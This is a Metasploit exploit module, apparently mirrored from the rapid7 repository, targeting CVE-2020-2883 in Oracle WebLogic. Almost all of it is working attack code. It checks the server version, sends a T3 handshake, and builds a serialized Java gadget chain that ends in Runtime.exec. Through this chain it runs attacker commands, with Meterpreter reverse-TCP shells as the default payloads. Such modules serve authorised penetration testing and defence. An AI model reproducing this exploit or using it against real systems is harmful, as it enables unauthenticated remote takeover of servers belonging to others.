CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::CmdStager

11
  include Msf::Exploit::Powershell

12
  prepend Msf::Exploit::Remote::AutoCheck

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'WebLogic Server Deserialization RCE BadAttributeValueExpException ExtComp',

19
        'Description' => %q{

20
          There exists a Java object deserialization vulnerability

21
          in multiple versions of WebLogic.

22


23
          Unauthenticated remote code execution can be achieved by

24
          sending a serialized `BadAttributeValueExpException`

25
          object over the T3 protocol to vulnerable versions of

26
          WebLogic. Leveraging an `ExtractorComparator` enables

27
          the ability to trigger `method.invoke()`, which will

28
          execute arbitrary code.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'Quynh Le', # Vulnerability Discovery

33
          'Y4er', # PoC

34
          'Shelby Pace', # Metasploit Module

35
          'Steve Embling' # T3S additions

36
        ],

37
        'References' => [

38
          [ 'CVE', '2020-2883' ],

39
          [ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ],

40
        ],

41
        'Platform' => %w[unix linux win],

42
        'Arch' => [ ARCH_X86, ARCH_X64 ],

43
        'Privileged' => false,

44
        'Targets' => [

45
          [

46
            'Windows',

47
            {

48
              'Platform' => 'win',

49
              'Arch' => [ ARCH_X86, ARCH_X64 ],

50
              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }

51
            }

52
          ],

53
          [

54
            'Unix',

55
            {

56
              'Platform' => %w[unix linux],

57
              'CmdStagerFlavor' => 'printf',

58
              'Arch' => [ ARCH_X86, ARCH_X64 ],

59
              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }

60
            }

61
          ],

62
        ],

63
        'DisclosureDate' => '2020-04-30',

64
        'DefaultTarget' => 0,

65
        'Notes' => {

66
          'Reliability' => [REPEATABLE_SESSION],

67
          'Stability' => [CRASH_SAFE],

68
          'SideEffects' => [IOC_IN_LOGS]

69
        }

70
      )

71
    )

72


73
    register_options([

74
      Opt::RPORT(7001),

75
    ])

76


77
    register_advanced_options([

78
      OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])

79
    ])

80
  end

81


82
  def check

83
    connect

84


85
    web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: #{peer}\n\n"

86
    sock.put(web_req)

87
    sleep(2)

88
    res = sock.get

89


90
    versions =

91
      [

92
        Rex::Version.new('12.1.3.0.0'), Rex::Version.new('12.2.1.3.0'),

93
        Rex::Version.new('12.2.1.4.0')

94
      ]

95


96
    return CheckCode::Unknown('Failed to obtain response from service') unless res

97


98
    /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res

99
    return CheckCode::Unknown('Failed to detect WebLogic') unless version

100


101
    @version_no = Rex::Version.new(version)

102
    print_status("WebLogic version detected: #{@version_no}")

103


104
    return CheckCode::Appears if versions.include?(@version_no)

105


106
    CheckCode::Detected('Version of WebLogic is not vulnerable')

107
  ensure

108
    disconnect

109
  end

110


111
  def exploit

112
    connect

113
    print_status('Sending handshake...')

114
    t3_handshake

115


116
    if target.name == 'Windows'

117
      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })

118
      win_obj.prepend('cmd.exe /c ')

119
      win_obj = build_payload_obj(win_obj)

120
      t3_send(win_obj)

121
    else

122
      execute_cmdstager

123
    end

124
  ensure

125
    disconnect

126
  end

127


128
  def t3_handshake

129
    # t3 12.2.1\nAS:255

130
    # \nHL:19\nMS:100000

131
    # 00\n\n

132
    if !datastore['SSL'] || datastore['FORCE_T3']

133
      shake = '7433'

134
    else

135
      shake = '743373'

136
    end

137
    shake << '2031322e322e310a41533a323535'

138
    shake << '0a484c3a31390a4d533a313030303030'

139
    shake << '30300a0a'

140


141
    sock.put([shake].pack('H*'))

142
    sleep(1)

143
    sock.get_once

144
  end

145


146
  def build_payload_obj(payload_data)

147
    payload_obj = 'aced0005' # STREAM_MAGIC, STREAM_VERSION

148
    payload_obj << '73720017' # TC_OBJECT, TC_CLASSDESC, class name length: 23

149
    payload_obj << '6a6176612e7574696c2e5072696f726974795175657565' # java.util.PriorityQueue

150
    payload_obj << '94da30b4fb3f82b1' # SerialVersionUID

151
    payload_obj << '030002' # 2 fields

152
    payload_obj << '490004' # Integer, field name length: 4

153
    payload_obj << '73697a65' # size

154
    payload_obj << '4c000a' # Object, field name length: 10

155
    payload_obj << '636f6d70617261746f72' # comparator

156
    payload_obj << '740016' # String, field name length: 22

157
    payload_obj << '4c6a6176612f7574696c2f436f6d70617261746f723b' # Ljava/util/Comparator;

158
    payload_obj << '7870'

159
    payload_obj << '00000002'

160
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

161
    payload_obj << '0030' # Class name length: 48

162
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e636f' # com.tangosol.util.comparator.ExtractorComparator

163
    payload_obj << '6d70617261746f722e457874726163746f72436f'

164
    payload_obj << '6d70617261746f72'

165
    payload_obj << extractor_comp_uid # SerialVersionUID

166
    payload_obj << '020001' # Serializable, 1 field

167
    payload_obj << '4c000b' # Object, field name length: 11

168
    payload_obj << '6d5f657874726163746f72' # m_extractor

169
    payload_obj << '740022'

170
    payload_obj << '4c636f6d2f74616e676f736f6c2f7574696c2f56' # Lcom/tangosol/util/ValueExtractor;

171
    payload_obj << '616c7565457874726163746f723b'

172
    payload_obj << '7870'

173
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC

174
    payload_obj << '002c' # Class name length: 44

175
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ChainedExtractor

176
    payload_obj << '74726163746f722e436861696e65644578747261'

177
    payload_obj << '63746f72'

178
    payload_obj << chained_extractor_uid # SerialVersionUID

179
    payload_obj << '020000'

180
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

181
    payload_obj << '0036' # Class name length: 54

182
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractCompositeExtractor

183
    payload_obj << '74726163746f722e4162737472616374436f6d70'

184
    payload_obj << '6f73697465457874726163746f72'

185
    payload_obj << '086b3d8c05690f44' # SerialVersionUID

186
    payload_obj << '020001' # Serializable, 1 field

187
    payload_obj << '5b000c' # array, length: 12

188
    payload_obj << '6d5f61457874726163746f72' # m_aExtractor

189
    payload_obj << '740023' # String, length: 35

190
    payload_obj << '5b4c636f6d2f74616e676f736f6c2f7574696c2f' # [Lcom/tangosol/util/ValueExtractor;

191
    payload_obj << '56616c7565457874726163746f723b'

192
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

193
    payload_obj << '002d' # Class name length: 45

194
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractExtractor

195
    payload_obj << '74726163746f722e416273747261637445787472'

196
    payload_obj << '6163746f72'

197
    payload_obj << abstract_extractor_uid # SerialVersionUID

198
    payload_obj << '020001' # Serializable, 1 field

199
    payload_obj << '490009' # Integer, field name length: 9

200
    payload_obj << '6d5f6e546172676574' # m_nTarget

201
    payload_obj << '7870'

202
    payload_obj << '00000000'

203
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC

204
    payload_obj << '0023' # Class name length: 35

205
    payload_obj << '5b4c636f6d2e74616e676f736f6c2e7574696c2e' # [Lcom.tangosol.util.ValueExtractor;

206
    payload_obj << '56616c7565457874726163746f723b'

207
    payload_obj << '2246204735c4a0fe' # SerialVersionUID

208
    payload_obj << '020000'

209
    payload_obj << '7870'

210
    payload_obj << '00000003'

211
    payload_obj << '7372'

212
    payload_obj << '002f' # Class name length: 47

213
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ReflectionExtractor

214
    payload_obj << '74726163746f722e5265666c656374696f6e4578'

215
    payload_obj << '74726163746f72'

216
    payload_obj << reflection_extractor_uid # SerialVersionUID

217
    payload_obj << '02000' # Serializable

218
    payload_obj << reflect_extract_count

219
    payload_obj << '5b0009' # array, length: 9

220
    payload_obj << '6d5f616f506172616d' # m_aoParam

221
    payload_obj << '740013' # String, length: 19

222
    payload_obj << '5b4c6a6176612f6c616e672f4f626a6563743b' # [Ljava/lang/Object;

223
    payload_obj << add_sect

224
    payload_obj << '4c0009' # Object, length: 9

225
    payload_obj << '6d5f734d6574686f64' # m_sMethod

226
    payload_obj << '740012' # String, length: 18

227
    payload_obj << '4c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;

228
    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE

229
    payload_obj << '007e0009' # handle

230
    payload_obj << '00000000'

231
    payload_obj << '7572'

232
    payload_obj << '0013' # Class name length: 19

233
    payload_obj << '5b4c6a6176612e6c616e672e4f626a6563743b' # [Ljava.lang.Object;

234
    payload_obj << '90ce589f1073296c' # SerialVersionUID

235
    payload_obj << '020000'

236
    payload_obj << '7870'

237
    payload_obj << '00000002'

238
    payload_obj << '74000a' # String, length: 10

239
    payload_obj << '67657452756e74696d65' # getRuntime

240
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC

241
    payload_obj << '0012' # Class name length: 18

242
    payload_obj << '5b4c6a6176612e6c616e672e436c6173733b' # [Ljava.lang.Class;

243
    payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID

244
    payload_obj << '020000' # Serializable, no fields

245
    payload_obj << '7870'

246
    payload_obj << '00000000'

247
    payload_obj << add_tc_null

248
    payload_obj << '740009' # String, length: 9

249
    payload_obj << '6765744d6574686f64' # getMethod

250
    payload_obj << '7371'

251
    payload_obj << '007e000d' # handle

252
    payload_obj << '00000000'

253
    payload_obj << '7571'

254
    payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle

255
    payload_obj << '00000002'

256
    payload_obj << '707571'

257
    payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle

258
    payload_obj << '00000000'

259
    payload_obj << add_tc_null

260
    payload_obj << '740006' # String, length: 6

261
    payload_obj << '696e766f6b65' # invoke

262
    payload_obj << '7371'

263
    payload_obj << '007e000d' # handle

264
    payload_obj << '00000000'

265
    payload_obj << '7571'

266
    payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle

267
    payload_obj << '00000001'

268
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC

269
    payload_obj << '0013' # Class name length: 19

270
    payload_obj << '5b4c6a6176612e6c616e672e537472696e673b' # [Ljava.lang.String;

271
    payload_obj << 'add256e7e91d7b47' # SerialVersionUID

272
    payload_obj << '020000'

273
    payload_obj << '7870'

274
    payload_obj << '00000003'

275


276
    payload_bin = format_payload(payload_data)

277
    payload_obj << payload_bin

278


279
    payload_obj << add_tc_null

280
    payload_obj << '740004'

281
    payload_obj << '65786563' # exec

282
    payload_obj << '7704'

283
    payload_obj << '00000003'

284
    payload_obj << '76720011'

285
    payload_obj << '6a6176612e6c616e672e52756e74696d65' # java.lang.Runtime

286
    payload_obj << '0000000000000000000000'

287
    payload_obj << '7870'

288
    payload_obj << '740001'

289
    payload_obj << '3178'

290
  end

291


292
  def extractor_comp_uid

293
    case @version_no

294
    when Rex::Version.new('12.1.3.0.0')

295
      'c7ad6d3a676f3c18'

296
    when Rex::Version.new('12.2.1.3.0')

297
      'fb4ac83df1d72edc'

298
    else

299
      'f9b3bc58cc52cd21'

300
    end

301
  end

302


303
  def change_handle?

304
    @version_no == Rex::Version.new('12.2.1.3.0')

305
  end

306


307
  def chained_extractor_uid

308
    case @version_no

309
    when Rex::Version.new('12.1.3.0.0')

310
      '889f81b0945d5b7f'

311
    when Rex::Version.new('12.2.1.3.0')

312
      '06ee10433a4cc4b4'

313
    else

314
      '435b250b72f63db5'

315
    end

316
  end

317


318
  def abstract_extractor_uid

319
    case @version_no

320
    when Rex::Version.new('12.1.3.0.0')

321
      '658195303e723821'

322
    when Rex::Version.new('12.2.1.3.0')

323
      '752289ad4d460138'

324
    else

325
      '9b1be18ed70100e5'

326
    end

327
  end

328


329
  def reflection_extractor_uid

330
    case @version_no

331
    when Rex::Version.new('12.1.3.0.0')

332
      'ee7ae995c02fb4a2'

333
    when Rex::Version.new('12.2.1.3.0')

334
      '87973791b26429dd'

335
    else

336
      '1f62f564b951b614'

337
    end

338
  end

339


340
  def reflect_extract_count

341
    case @version_no

342
    when Rex::Version.new('12.2.1.3.0')

343
      '3'

344
    else

345
      '2'

346
    end

347
  end

348


349
  def add_sect

350
    sect = ''

351


352
    if @version_no == Rex::Version.new('12.2.1.3.0')

353
      sect << '4c0011' # Object, length: 17

354
      sect << '6d5f657874726163746f' # m_extractorCached

355
      sect << '72436163686564'

356
      sect << '740012'

357
      sect << '4c6a6176612f6c616e67' # Ljava/lang/Object;

358
      sect << '2f4f626a6563743b'

359
    end

360


361
    sect

362
  end

363


364
  def add_tc_null

365
    return '70' if @version_no == Rex::Version.new('12.2.1.3.0')

366


367
    ''

368
  end

369


370
  def t3_send(payload_obj)

371
    print_status('Sending object...')

372


373
    request_obj = '000009f3' # Original packet length

374
    request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags

375
    request_obj << 'ffffffffffffffff'

376
    request_obj << '00000071'

377
    request_obj << '0000ea60'

378
    request_obj << '00000018432ec6'

379
    request_obj << 'a2a63985b5af7d63e643'

380
    request_obj << '83f42a6d92c9e9af0f94'

381
    request_obj << '72027973720078720178'

382
    request_obj << '720278700000000c0000'

383
    request_obj << '00020000000000000000'

384
    request_obj << '00000001007070707070'

385
    request_obj << '700000000c0000000200'

386
    request_obj << '00000000000000000000'

387
    request_obj << '01007006'

388
    request_obj << 'fe010000' # separator

389
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION

390
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC

391
    request_obj << '001d' # Class name length: 29

392
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry

393
    request_obj << '6a766d2e436c61737354'

394
    request_obj << '61626c65456e747279'

395
    request_obj << '2f52658157f4f9ed' # SerialVersionUID

396
    request_obj << '0c0000' # flags?

397
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC

398
    request_obj << '0024' # Class name length: 36

399
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo

400
    request_obj << '6f6d6d6f6e2e696e7465'

401
    request_obj << '726e616c2e5061636b61'

402
    request_obj << '6765496e666f'

403
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID

404
    request_obj << '020009' # Serializable, 9 fields

405
    request_obj << '490005' # Field type: Int, field name length: 5

406
    request_obj << '6d616a6f72' # major

407
    request_obj << '490005' # Field type: Int, field name length: 5

408
    request_obj << '6d696e6f72' # minor

409
    request_obj << '49000b' # Field type: Int, field name length: 11

410
    request_obj << '70617463685570646174' # patchUpdate

411
    request_obj << '65'

412
    request_obj << '49000c' # Field type: Int, field name length: 12

413
    request_obj << '726f6c6c696e67506174' # rollingPatch

414
    request_obj << '6368'

415
    request_obj << '49000b' # Field type: Int, field name length: 11

416
    request_obj << '73657276696365506163' # servicePack

417
    request_obj << '6b'

418
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14

419
    request_obj << '74656d706f7261727950' # temporaryPatch

420
    request_obj << '61746368'

421
    request_obj << '4c0009' # Field type: Object, field name length: 9

422
    request_obj << '696d706c5469746c65' # implTitle

423
    request_obj << '740012' # String, length: 18

424
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;

425
    request_obj << '2f537472696e673b'

426
    request_obj << '4c000a' # Field type: Object, field name length: 10

427
    request_obj << '696d706c56656e646f72' # implVendor

428
    request_obj << '71007e0003' # TC_REFERENCE, handle

429
    request_obj << '4c000b' # Field type: Object, field name length: 11

430
    request_obj << '696d706c56657273696f6e' # implVersion

431
    request_obj << '71007e0003' # TC_REFERENCE, handle

432
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

433
    request_obj << '7702' # TC_ENDBLOCKDATA

434
    request_obj << '000078'

435
    request_obj << 'fe010000' # separator

436


437
    request_obj << payload_obj

438


439
    request_obj << 'fe010000' # separator

440
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION

441
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC

442
    request_obj << '001d' # Class name length: 29

443
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry

444
    request_obj << '6a766d2e436c61737354'

445
    request_obj << '61626c65456e747279'

446
    request_obj << '2f52658157f4f9ed' # SerialVersionUID

447
    request_obj << '0c0000'

448
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC

449
    request_obj << '0021' # Class name length: 33

450
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo

451
    request_obj << '6f6d6d6f6e2e696e7465'

452
    request_obj << '726e616c2e5065657249'

453
    request_obj << '6e666f'

454
    request_obj << '585474f39bc908f1' # SerialVersionUID

455
    request_obj << '020007' # Serializable, 7 fields

456
    request_obj << '490005' # Field type: Int, field name length: 5

457
    request_obj << '6d616a6f72' # major

458
    request_obj << '490005' # Field type: Int, field name length: 5

459
    request_obj << '6d696e6f72' # minor

460
    request_obj << '49000b' # Field type: Int, field name length: 11

461
    request_obj << '70617463685570646174' # patchUpdate

462
    request_obj << '65'

463
    request_obj << '49000c' # Field type: Int, field name length: 12

464
    request_obj << '726f6c6c696e67506174' # rollingPatch

465
    request_obj << '6368'

466
    request_obj << '49000b' # Field type: Int, field name length: 11

467
    request_obj << '73657276696365506163' # servicePack

468
    request_obj << '6b'

469
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14

470
    request_obj << '74656d706f7261727950' # temporaryPatch

471
    request_obj << '61746368'

472
    request_obj << '5b0008' # Field type: Array, field name length: 8

473
    request_obj << '7061636b61676573' # packages

474
    request_obj << '740027' # String, length: 39

475
    request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;

476
    request_obj << '2f636f6d6d6f6e2f696e'

477
    request_obj << '7465726e616c2f506163'

478
    request_obj << '6b616765496e666f3b'

479
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

480
    request_obj << '0024' # Class name length: 36

481
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo

482
    request_obj << '6f6d6d6f6e2e696e7465'

483
    request_obj << '726e616c2e5665727369'

484
    request_obj << '6f6e496e666f'

485
    request_obj << '972245516452463e' # SerialVersionUID

486
    request_obj << '020003' # Serializable, 3 fields

487
    request_obj << '5b0008' # Field type: Array, field name length: 8

488
    request_obj << '7061636b61676573' # packages

489
    request_obj << '71007e0003' # TC_REFERENCE, handle

490
    request_obj << '4c000e' # Field type: Object, field name length: 14

491
    request_obj << '72656c65617365566572' # releaseVersion

492
    request_obj << '73696f6e'

493
    request_obj << '740012' # String, length: 18

494
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;

495
    request_obj << '2f537472696e673b'

496
    request_obj << '5b0012' # Field type: Array, field name length: 18

497
    request_obj << '76657273696f6e496e66' # versionInfoAsBytes

498
    request_obj << '6f41734279746573'

499
    request_obj << '740002' # String, length: 2

500
    request_obj << '5b42' # [B

501
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC

502
    request_obj << '0024' # Class name length: 36

503
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo

504
    request_obj << '6f6d6d6f6e2e696e7465'

505
    request_obj << '726e616c2e5061636b61'

506
    request_obj << '6765496e666f'

507
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID

508
    request_obj << '020009' # Serializable, 9 fields

509
    request_obj << '490005' # Field type: Int, field name length: 5

510
    request_obj << '6d616a6f72' # major

511
    request_obj << '490005' # Field type: Int, field name length: 5

512
    request_obj << '6d696e6f72' # minor

513
    request_obj << '49000b' # Field type: Int, field name length: 11

514
    request_obj << '70617463685570646174' # patchUpdate

515
    request_obj << '65'

516
    request_obj << '49000c' # Field type: Int, field name length: 12

517
    request_obj << '726f6c6c696e67506174' # rollingPatch

518
    request_obj << '6368'

519
    request_obj << '49000b' # Field type: Int, field name length: 11

520
    request_obj << '73657276696365506163' # servicePack

521
    request_obj << '6b'

522
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14

523
    request_obj << '74656d706f7261727950' # temporaryPatch

524
    request_obj << '61746368'

525
    request_obj << '4c0009' # Field type: Object, field name length: 9

526
    request_obj << '696d706c5469746c65' # implTitle

527
    request_obj << '71007e0005' # TC_REFERENCE, handle

528
    request_obj << '4c000a' # Field type: Object, field name length: 10

529
    request_obj << '696d706c56656e646f72' # implVendor

530
    request_obj << '71007e0005' # TC_REFERENCE, handle

531
    request_obj << '4c000b' # Field type: Object, field name length: 11

532
    request_obj << '696d706c56657273696f' # implVersion

533
    request_obj << '6e'

534
    request_obj << '71007e0005' # TC_REFERENCE, handle

535
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL

536
    request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA

537
    request_obj << 'fe00ff' # separator

538
    request_obj << 'fe010000'

539
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION

540
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC

541
    request_obj << '0013' # Class name length: 19

542
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID

543
    request_obj << '6a766d2e4a564d4944'

544
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID

545
    request_obj << '0c0000'

546
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA

547
    request_obj << '4621'

548
    request_obj << '000000000000000000'

549
    request_obj << '09' # length: 9

550
    request_obj << '3132372e302e312e31' # 127.0.1.1

551
    request_obj << '000b' # length: 11

552
    request_obj << '75732d6c2d627265656e' # us-l-breens

553
    request_obj << '73'

554
    request_obj << 'a53caff10000000700'

555
    request_obj << '001b59'

556
    request_obj << 'ffffffffffffffffffff'

557
    request_obj << 'ffffffffffffffffffff'

558
    request_obj << 'ffffffff'

559
    request_obj << '0078'

560
    request_obj << 'fe010000' # separator

561
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION

562
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC

563
    request_obj << '0013' # Class name length: 19

564
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID

565
    request_obj << '6a766d2e4a564d4944'

566
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID

567
    request_obj << '0c0000'

568
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA

569
    request_obj << '1d0181401281'

570
    request_obj << '34bf427600093132372e'

571
    request_obj << '302e312e31a53caff1'

572
    request_obj << '000000000078'

573


574
    new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')

575
    request_obj[0, 8] = new_len

576


577
    sock.put([request_obj].pack('H*'))

578
    sleep(1)

579
  end

580


581
  def format_payload(payload_cmd)

582
    print_status('Formatting payload...')

583
    payload_arr = payload_cmd.split(' ', 3)

584


585
    formatted_payload = ''

586
    payload_arr.each do |part|

587
      formatted_payload << '74' # denotes a string

588
      formatted_payload << part.length.to_s(16).rjust(4, '0')

589
      formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join

590
    end

591


592
    formatted_payload

593
  end

594


595
  def execute_command(cmd, _opts = {})

596
    cmd.prepend('/bin/sh -c ')

597
    cmd = build_payload_obj(cmd)

598


599
    t3_send(cmd)

600
  end

601
end

602


603